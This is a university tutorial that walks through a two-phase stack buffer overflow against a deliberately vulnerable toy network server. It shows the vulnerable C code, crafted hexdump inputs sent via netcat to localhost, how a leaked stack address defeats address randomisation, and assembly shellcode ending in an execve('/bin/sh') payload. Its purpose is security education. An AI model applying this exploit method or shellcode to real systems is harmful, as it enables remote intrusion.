Note: All files needed for this tutorial can be found here.
Tutorial: a trivial stack-based buffer overflow in two phases By H. Bos Updated: September 2007, June 2008. ---------------------------------------------------------------------- This tutorial shows a trivial case of a two-phase attack that works on systems with address space randomisation (ASR). The attack is a simple network-based stack smashing exploit. The reason for writing this tutorial is that students sometimes ask the following questions when we are discussing the basics of buffer overflows: "Surely, address space randomisation makes stack overflows impossible?" "How do you know the address of the buffer containing your shellcode? After all, you need this address a priori. Otherwise, where will you make the program jump?" I stress that the example below is just one of many possibities and perhaps (hopefully) the easiest one to understand. It only serves to demonstrate how you could make a simple stack smashing attack work on a modern Linux distribution. Note however, that it assumes that stack smashing itself is not prevented. For instance, it will not work if canary values are used to protect the stack. You may want to compile with -fno-stack-protector to be sure. Before you start, make sure to have installed the following tools (or their equivalents): hexedit, hexdump, netcat, and nasm. ---------------------------------------------------------------------- Introduction ------------ In a 2-phase attack, a first connection is used to obtain the address of a known value (in this case on the stack). This address is used to calculate the appropriate address to place in the return address. The vulnerable server is shown in vulnerable.c. It is a quick and dirty implementation, with a bunch of debug messages you may ignore. But it works and it is, in principle, a real network server. You can make the server by typing: make It should create an executable 'badbuf' that can be started with: badbuf <port> For instance, start the server so as to make it listen on port 54321: debris: ../bufferoverflow>badbuf 54321 The vulnerable function is called oops(). It looks like this: int oops (int newsockfd) { int len; char buf [56]; int i,n; len = 56; bzero(buf,len); n = read (newsockfd, buf, 255); // overflow possible if (n < 0) error("ERROR reading from socket"); // 'echo' the message if (len>255) len = 255; printf ("Echoing %d characters\n", len); for (i=0; i<len; i++) { // pretty dumb svr: echos characters 1 at a time write(newsockfd, buf+i,1); if (n < 0) error("ERROR writing to socket"); } return 0; } A. The main idea ---------------------------------------------------------------------- Stack smashing is not complicated at all. It does require some knowledge about how a stack frame is organised in our x86 based machines: - The stack grows from top (high addresses) to bottom (low-addresses). - When a function is called the following info is found on the stack * first, the parameters are pushed on the stack [Actually, a small no. of parameters can be passed via registers, but let us ignore that for now, as it is not very important for this tutorial.] * Second, the return address is pushed. This is the address that the CPU will jump to when the function returns. * Next, we find the saved frame pointer (or EBP, as Intel refers to it as 'extended base pointer'). EBP points to the previous stack frame. More precisely, it points to the place in the previous stack frame, where *it* has saved the saved the previous EBP). * Finally, we find the space for local variables on the stack. Whenever the function declares a local variable (such as 'len' in the function 'oops()' above), the appropriate amount of memory is reserved. In the case of 'len', this will be 4 bytes. In the case of 'buf' 56 bytes, and so on. Note that the size of buffer 'buf' in function oops is 56B. We want to overflow it in such a way that we get to control the program. In other words, we want to feed it a chunk of data that overflows the buffer 'buf' and puts a new address at the location that holds the return address of the function. Then, when the function returns, it will return to the address we provided, rather than the location from where the function call was made. For simplicity, we will place our 'shellcode' in buf, so we want to overflow the return address with the address of buf. So, when the function returns, the CPU will jump to the beginning of 'buf' and start executing the instructions that it finds there (i.e., *our* shellcode). Unfortunately, modern OSs use ASR, so we do not know at which address buf resides. So, we use two-phase attack. First, we overflow the buffer to make the program send us a stack address (the saved EBP value). We then use this address to calculate the location of buf. B. Finding the address to put in the return address field on the stack ---------------------------------------------------------------------- To do this we overflow the buffer in such a way that a new value is placed in the variable 'len' (which happens to sit just above 'buf'), which causes the program to output more data than it intended. For instance, we send the following data to the svr (assume that we have saved the data in the file getaddress.inp): debris: ../bufferoverflow>hexdump -C getaddress.inp 00000000 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 |0123456789012345| 00000010 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 |6789012345678901| 00000020 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 |2345678901234567| 00000030 38 39 30 31 32 33 34 35 58 00 00 00 |89012345X...| The input contains 56 ascii characters (the numbers 0-9), followed by 0x00000058 (in little endian). Because 'len' sits just above 'buf', this input will overwrite 'len' with 0x58 and cause the program to 'echo' 0x58 = 88 characters, i.e., the buffer *plus* a fair share of the stack above it. Hopefully, this yields something useful. We send the above input using the program netcat ('nc') as follows (client and server are both running on the same host): debris: ../bufferoverflow>cat getaddress.inp | nc 127.0.0.1 54321 | hexdump -C 00000000 30 31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 |0123456789012345| 00000010 36 37 38 39 30 31 32 33 34 35 36 37 38 39 30 31 |6789012345678901| 00000020 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 37 |2345678901234567| 00000030 38 39 30 31 32 33 34 35 58 00 00 00 3c 00 00 00 |89012345X...<...| 00000040 3c 00 00 00 d8 f5 ff bf 7a 89 04 08 04 00 00 00 |<.......z.......| 00000050 a8 f5 ff bf c8 f5 ff bf |........| 00000058 Yes, we found something useful: the saved EBP. It is the address 'd8 f5 ff bf' in line 00000040. How do I know this is the appropriate address? Well, it is the first 4 byte number that *looks* like a stack address above the 'buf' and 'len' variables. It is followed by a 4 bytes number that looks like an instruction address, so we are probably on the right track. You may wonder about the two 4B values between 'len' and 'saved EBP'. Apparently, the compiler reserved this space here for other variables. (It is not very important, but you may suspect that it corresponds to the amount of data that was read, as the value is 0x3C = 60 bytes, which is exactly the amount of data in getaddress.inp.) As mentioned earlier, the 'old EBP' value saved on the stack points to a specific place in the previous stack frame. Let us see: d8 f5 ff bf in little endian -> bffff5d8 We know the program, so we are able to find out the difference between the previous EBP and the current location where EBP was stored. (If you don't know this precisely, it is not so hard to find, either by analysis, or by trial and error). In my case, this happens to be 0x50 = 80. Now, the difference with the start of buf can also be easily calculated: EBP was saved at 0xbffff5d8-0x50 = 0xbffff588. We know (and/or see from our hexdump above) that the start of buffer is 68B below the address at which EBP was stored, so we have to patch in the address: 0xbffff588 - 0x44 = 0xbffff544 I wrote a small shell script to calculate this. Simply copy in the bytes as reported by the hexdump output above and the result (in the most useful order will be printed): debris: ../bufferoverflow>calcAddr.sh d8 f5 ff bf 44 F5 FF BF debris: ../bufferoverflow> These hex numbers will be used later on. *** SHORTCUT: if you hate typing and want to be really efficient, you can use the following (somewhat cryptic command): ./calcAddr.sh `cat getaddress.inp | nc 127.0.0.1 54321 | hexdump -C | grep -m 1 -o -G [0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]][0-9a-f][0-9a-f][[:space:]]bf This invokes calcAddr.sh on the first occurrence of an address like ?? ?? ?? bf in whatever we receive from the server. Don't you just love Unix? B. The shellcode ---------------------------------------------------------------------- Now we must provide a bit of 'shellcode' to be executed and patch in the return addres that we just calculated at the appropriate place. We will do this using hexedit. Again, we want to send the shellcode in an input and with that same input overflow the return address to make the CPU return to the start of 'buf' (which by then contains the shellcode). So the malicious input we will generate looks like this: |----------| | 44F5FFBF | |----------| | | | | |shellcode | | | | | |----------| The shellcode.asm should be suitable for this vulnerability. It is easily small enough to fit in the 56B buffer. It does not do much (just prints 'hello world'), but that is not the point. Writing good shellcode is an art, but a bit of knowledge of assembly should go a long way. This is our program in assembly: [SECTION .text] global _start _start: jmp short stringaddress mystart: xor eax, eax ;clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx mov al, 4 ;syscall 4 means a write mov bl, 1 ;stdout is 1 pop ecx ;get the address of the string from the stack mov dl, 13 ;length of the string int 0x80 ;do syscall xor eax, eax mov al, 1 ;syscall 1=exit (so we exit the shellcode) xor ebx,ebx int 0x80 stringaddress: call mystart ;puts the address of the string on the stack :) db "hello world!" Now we want to get the machine code that corresponds to this code: debris: ../bufferoverflow>nasm -felf shellcode.asm debris: ../bufferoverflow>ld -s -o scode shellcode.o debris: ../bufferoverflow>objdump -d scode h: file format elf32-i386 Disassembly of section .text: 08048060 <.text>: 8048060: eb 19 jmp 0x804807b 8048062: 31 c0 xor %eax,%eax 8048064: 31 db xor %ebx,%ebx 8048066: 31 d2 xor %edx,%edx 8048068: 31 c9 xor %ecx,%ecx 804806a: b0 04 mov $0x4,%al 804806c: b3 01 mov $0x1,%bl 804806e: 59 pop %ecx 804806f: b2 0d mov $0xd,%dl 8048071: cd 80 int $0x80 8048073: 31 c0 xor %eax,%eax 8048075: b0 01 mov $0x1,%al 8048077: 31 db xor %ebx,%ebx 8048079: cd 80 int $0x80 804807b: e8 e2 ff ff ff call 0x8048062 8048080: 68 65 6c 6c 6f push $0x6f6c6c65 8048085: 20 77 6f and %dh,0x6f(%edi) 8048088: 72 6c jb 0x80480f6 804808a: 64 fs 804808b: 21 .byte 0x21 804808c: 5c pop %esp 804808d: 6e outsb %ds:(%esi),(%dx) Ok, that is just what we need. Let us stick the numbers in the middle column in a file and call it shellcode.inp: debris: ../bufferoverflow>hexedit shellcode.inp 00000000 EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2 ..1.1.1.1.....Y. 00000010 0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF ...1...1........ 00000020 68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C We still have to make sure to add the return address at the appropriate offset. The return address was calculated under (B). We place at the location that is just 4B up from where we found the save value of EBP (i.e., at offset 0x48). 00000000 EB 19 31 C0 31 DB 31 D2 31 C9 B0 04 B3 01 59 B2 ..1.1.1.1.....Y. 00000010 0C CD 80 31 C0 B0 01 31 DB CD 80 E8 E2 FF FF FF ...1...1........ 00000020 68 65 6C 6C 6F 20 77 6F 72 6C 64 20 0C 00 00 00 hello world .... 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040 00 00 00 00 00 00 00 00 44 F5 FF BF ........D... Now our exploit is ready. Let us send it to the badbuf server that is still running: debris: ../bufferoverflow>cat shellcode.inp | nc 127.0.0.1 54321 At the server side, the result is that the server prints 'hello world' and exits. The full run is shown below (it includes the output generated on behalf of the first connection): debris: ../bufferoverflow>badbuf 54321 Echoing 88 characters returned Echoing 0 characters hello world debris: ../bufferoverflow> The exploit worked! This is the end of the tutorial. We just have some additional comments. *** SHORTCUT NOTE: use the script './attack.sh <port>' if you want to automate this entire procedure. The script will send getaddress.inp, extract the address of EBP, calculate the address of our buffer, patch in the address in shellcode.inp, and send it to the server. *** The hello world example shown above of course cannot be termed 'shellcode' as it does not give you a shell. The following shellcode is more interesting. As I am switching from nasm to as, i will give this example in gnu syntax: .section .text .global _start _start: /* we first jump to string address and then immediately return via a call, so that when we arrive at mystart, the address of the string will be on the stack. Clever. */ jmp string_addr mystart: pop %ebx /* get the string address */ xor %eax,%eax /* zero eax */ movb %al, 7(%ebx) /* move a NULL in 'N' position of the string */ movl %ebx, 8(%ebx) /* mov the address of the string in XXXX */ movl %eax, 12(%ebx) /* mov 0 (32b) in YYYY */ movb $11,%al /* syscall 11 = execve */ /* first argument (ebx) points to the file */ leal 8(%ebx), %ecx /* address of second argument in ecx*/ leal 12(%ebx), %edx /* address of third argument in ecx*/ int $0x80 /* do it */ string_addr: call mystart .asciz "/bin/shNXXXXYYYY" If you use this instead of the helloworld example you will get an actual shell on the server. Have fun! HJB